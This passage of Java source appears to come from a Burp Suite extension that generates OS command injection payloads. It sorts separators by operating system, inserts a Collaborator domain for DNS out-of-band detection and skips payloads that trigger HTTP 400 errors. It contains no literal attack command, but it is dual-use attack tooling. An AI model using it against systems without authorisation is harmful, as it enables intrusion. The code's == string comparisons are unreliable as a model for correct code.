        return callbacks.getHelpers().bytesToString(t);
    }    
    private boolean arraySearch(String needle, String[] hayStack)
    {
        for(int i=0;i<hayStack.length;i++)
        {
            if(hayStack[i]==needle) return true;
        }
        return false;
    }
    private String[] toStringArray(ArrayList<String> input)
    {
        String ret[];
        ret = new String[input.size()];
        for(int i=0;i<ret.length;i++)
        {
            ret[i]=input.get(i);
        }
        return ret;
    }
    private boolean incompatibleTargets(String entity, String payload, String what)
    {
        if(targetOS!="all") return false; // it's either strictly win or nix - in such case there should be no incompatible elements in the configuration in the first place
        // this might become false if we allow people to play with the the separators themselves (define their own ones)
        // in such case we'll remove this lind and perform the check every time this function is called
        // we discover the OS based on the existence of an OS-specific separator (ARGUMENT SEPARATOR)
        
        
        // matching does not work as we would like it to
        // we're gonna do some string carving instead
        // 1. we want to find the first occurrence (indexOf) the command
        // 2. we went to find the first occurrence (indexOf) of the argument
        // 3. we carve out [indexOfargument..indexOfCommand+commandLength] and we have our command separator
        //String cmdPattern = command+"(.*)"+argument;
        String separator="";
               
        //Pattern pattern = Pattern.compile(cmdPattern);
        //Matcher matcher = pattern.matcher(payload);
        //this.tab.shellingPanel.logOutput("Matching "+payload+" against "+cmdPattern+"\n");
        //if(matcher.matches())
        if(payload.contains(command)&&payload.contains(argument))
        {
            int commandIndexOf = payload.indexOf(command);
            int argumentIndexOf = payload.indexOf(argument); 
            if(commandIndexOf<argumentIndexOf) //
            {
                separator=payload.substring(commandIndexOf+command.length(),argumentIndexOf);            
            }
            else // won't happen with the way payloads are generated atm
            {
                separator=payload.substring(argumentIndexOf+argument.length(),commandIndexOf);            
            }
            //this.tab.shellingPanel.logOutput("Separator extracted: "+separator);
        }
        else
        {
            this.tab.shellingPanel.logOutput("Warning: the "+payload+" payload does not contain the "+command+" command and/or the "+argument+" argument.\nArgument separator could not be determined.\n");
            separator="";        
        }
        
        // whether the payload seems nix-like
        if(payload.contains("`")||payload.contains("$")||arraySearch(separator,this.toStringArray(this.nixArgumentSeparators)))
        {
            if("separator".equals(what))
            {
                if(arraySearch(entity,this.toStringArray(this.winArgumentSeparators)))
                {
                    return true;
                }
                if(arraySearch(entity,this.toStringArray(this.winCommandSeparators)))
                {
                    return true;
                }               
                return false;
            }
            if("terminator".equals(what))
            {
                if(arraySearch(entity,this.toStringArray(this.winCommandSeparators)))
                {
                    return true;
                }
                return false;
            }
            return false; 
        }
        if(arraySearch(separator,this.toStringArray(winArgumentSeparators))) // dealing with windows
        {
            if("separator".equals(what))
            {
                if(arraySearch(entity,this.toStringArray(this.nixCommandSeparators)))
                {
                  return true;   
                }
                if(arraySearch(entity,this.toStringArray(this.nixArgumentSeparators)))
                {
                  return true;   
                }
                return false;
            }
            if("terminator".equals(what))
            {
                if(arraySearch(entity,this.toStringArray(this.nixCommandTerminators)))
                {
                    return true;
                }
                return false;
            }
        }       
        return false;
    }
    private String getProperSuffix(String prefix)
    {
        String suffix=prefix;
        if(prefix.contains("'"))
        {
            suffix=suffix.replace("'","");
            suffix="'"+suffix;
        }
        else if(prefix.contains("\""))
        {
            suffix=suffix.replace("\"","");
            suffix="\""+suffix;
            
        }        
	return suffix;
    }
    @Override
    public boolean hasMorePayloads() 
    {
      if(this.payloadIndex < this.shellings.size()) return true;
      
      // also, update the label with the latest counter
      this.tab.shellingPanel.jTabbedPane1.setTitleAt(5,"Save "+this.shellings.size()+" payloads");
      // we ran out of payloads, return false just after checking for any collaborator interactions
      // save the payloads      
      // find the ID (don't use the public counter to avoid race conditions)
      // and save the payloads
      if(this.mode=="auto")
      {
            for(int i=this.tab.shellingPanel.collabSessions.size()-1;i>-1;i--)
            {
                if(this.tab.shellingPanel.collabSessions.get(i).collabLoc==this.loc)
                {
                
                    this.tab.shellingPanel.collabSessions.get(i).setShellingsRaw(this.shellings); // save the payloads in the session tracker
                    break;
                }
           }
      }
      // while this check is done always (we might be in manual mode but still receive asynchronous feedback from the auto mode)
      
      this.tab.shellingPanel.checkCollabInteractions(false);            
      return false;      
    }
    public String getPayload(int index)
    {
        if(index<this.shellings.size()) return this.shellings.get(index);
        return "";
    }
    public byte[] getNextPayloadSmart(byte[] baseValue, boolean last400Avoid) // used by the scanner
    {
        this.last400Avoid=last400Avoid;
        return getNextPayload(baseValue);
    }    
    @Override    
    public byte[] getNextPayload(byte[] baseValue) 
    {        
    // so, if we want to introduce smart 400 avoidance for both Scanner and Intruder, we need to be able to:
    // 1) modify the getNextPayload() method so it skips all the payloads with known bad chars (while still incrementing the index)
    // and returns the next valid payload
    // 2) find out from the getNextPayload method that:
    //  a) Smart 400 avoidance is on
    //  b) we have just encountered 400-s in result of sending requests containing those chars (beware of race conditions)
    
    // so we need two public properties
    // avoidance is on (can be read from the constructor once the instance is started)
    // last response was 400 AND the payload contained a whitechar (this is the problem, how can I know Intruder returned 400? I only generate payloads...
    //         
        if("mark".equals(this.payloadType))
        {            
            this.payloadIndex++;
            return callbacks.getHelpers().stringToBytes(Integer.toString(this.payloadIndex));
        }
        if("cmd".equals(this.payloadType))
        {                    
            // a loop has to be introduced here to allow skipping baddies once 400s are detected
            while(this.hasMorePayloads())
            {
                String p = this.shellings.get(this.payloadIndex);            
                byte[] payload = payload = callbacks.getHelpers().stringToBytes(p);
                
                if(this.last400Avoid==true) // whether HTTP 400 avoidance is enabled, we can do this before the BURP_COLLAB_DOMAIN and PREFIX_HOLDER substitution
                {
                    // search the payload and skip if baddies found
                    // yeah payloads are pre-generated
                    // but later on we selectively skip some of them from being provided to Intruder/Scanner
                    // which both do not know how many payloads will be returned
                    // thus they rely on the hasMorePayloads() loop and getNextPayload() method.
                    if(this.tab.shellingPanel.containsBaddies(payload)) 
                    {
                        // skip this payload and continue
                        if(this.tab.shellingPanel.verboseOutput==true)
                        {
                            this.tab.shellingPanel.logOutput("Skipped payload "+Integer.toString(this.payloadIndex)+" due to baddies detection.");
                        }
                        this.payloadIndex++;
                        continue;
                    } 
                }               
                if(p.contains("PREFIX_HOLDER"))
                {                
                    String base = callbacks.getHelpers().bytesToString(baseValue);
                    p=p.replace("PREFIX_HOLDER",base);
                }            
                if(p.contains("BURP_COLLAB_DOMAIN"))
                {
                    if(tab.shellingPanel.feedbackChannel=="DNS")
                    {
                        p=p.replace("BURP_COLLAB_DOMAIN",loc);
                    }
                    else
                    {
                        if(this.action!="export"&&this.payloadIndex==0) // prevent a nasty flood of messages, also do not issue this warning when doing export - someone might want to use the holder and replace it manually later
                        {
                            JOptionPane.showMessageDialog(null, "WARNING: the payload contains the BURP_COLLAB_DOMAIN special holder used with DNS feedback channel. However, the current feedback channel is "+tab.shellingPanel.feedbackChannel+". You are most likely doing it wrong.", "Argument <-> feedback channel missmatch!", JOptionPane.INFORMATION_MESSAGE);                                        
                        }                   
                    }                           
                    //this.shellings.get(this.payloadIndex).replace("BURP_COLLAB_DOMAIN", loc);
                }            
                this.shellings.set(this.payloadIndex,p); // update the payload with the result of the substitution
                
                this.payloadIndex++;                
                return callbacks.getHelpers().stringToBytes(p);           
            }            
            return new byte[0]; // if no more valid payloads are found (Smart 400 avoidance), we simply return this byte[0]  (we have to, as the DoScannerCheck class was already told that we have more payloads)
        }       
        return null; // should never happen (unreachable statement, but required by Java)
    }
    @Override
    public void reset() 
    {        
        payloadIndex = 0;
    }       
}